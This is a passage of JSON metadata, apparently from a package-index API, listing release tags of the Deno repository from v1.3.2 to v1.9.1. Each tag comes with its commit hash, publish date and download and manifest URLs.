tml_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.m